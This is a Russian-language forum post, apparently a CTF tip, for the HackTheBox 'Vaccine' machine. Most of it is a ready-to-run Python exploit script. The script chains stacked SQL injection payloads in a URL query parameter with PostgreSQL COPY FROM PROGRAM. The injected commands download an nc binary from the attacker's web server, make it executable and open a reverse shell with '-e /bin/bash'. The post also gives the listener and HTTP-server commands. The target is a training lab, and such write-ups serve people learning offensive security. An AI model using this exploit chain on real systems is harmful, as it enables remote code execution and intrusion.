Заметка HackTheBox - Vaccine sql exploit sheet

Темы, которые НЕ подходят по объему под префикс "Статья"
Всем привет. Прохожу сейчас Starting point на HackTheBox и столкнулся с проблемой на машине Vaccine,так как у них в walkthrough схема sql инъекции не работает. Нашел такой такой вот выход из ситуации.
Когда вы уже на стадии запускать sql инъекцию что бы добратся до shell.


1. Запустите nc -lvp 4444
2. Python3 -m SimpleHTTPServer 80
3. Запустите вот этот код
Python:
import requests
import random


your_cookie="XXXXXXXXXXXXXXXXXXXXXXXXXX"      #CHANGE ME !
your_IP="10.10.14.XXX"                        #CHANGE ME !
your_web_port="80"                            #CHANGE ME !
your_nc_port_listener="4444"                  #CHANGE ME !
your_nc_PATH="nc"                             #CHANGE ME ! --> The path to the nc executable inside your web server

'''
Autor: Florianges
This script exploit the SQL injection in the CTF vaccine on HTB
This script sends an nc executable to the server and runs it to generate a reverse shell
You must start a web server to host the executable nc --> exemple : sudo python -m SimpleHTTPServer 80
And you must run a nc listener --> exemple: nc -lvp 4444
Then you can execute this script with python3
Note: The nc executable hosted on your web server must be GNU nc (and therefore must not be nec from OpenBSD)
'''


nb_random = str(random.randint(1,100000))
i=0

cmd = ['DROP TABLE IF EXISTS cmd_'+nb_random,
       'CREATE TABLE cmd_'+ nb_random  +'(cmd_output text)',
       'COPY cmd_'+ nb_random +' FROM PROGRAM \'wget -P /tmp/'+ nb_random +' http://'+ your_IP +':'+ your_web_port +'/'+ your_nc_PATH + '\'',
       'COPY cmd_'+ nb_random +' FROM PROGRAM \'chmod 777 /tmp/'+ nb_random  +'/nc\'',
       'COPY cmd_'+ nb_random +' FROM PROGRAM \'/tmp/' + nb_random  +'/nc '+ your_IP  +' ' + your_nc_port_listener  +' -e /bin/bash\'']

while (i<=len(cmd)-1):
  url = "http://10.10.10.46/dashboard.php?search=a';"+ cmd[i]  +"; -- -"
  cookies = {'PHPSESSID': your_cookie}
  print("Payload --> " + url)
  if(i==4):
    print("All the payload is send, check your nc processus")
    print("You can spawn tty with this command: SHELL=/bin/bash script -q /dev/null")
  page = requests.get(url,cookies=cookies)
  i=i+1

Надеюсь это вам поможет не застопориться на этой машине. Всем спасибо.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!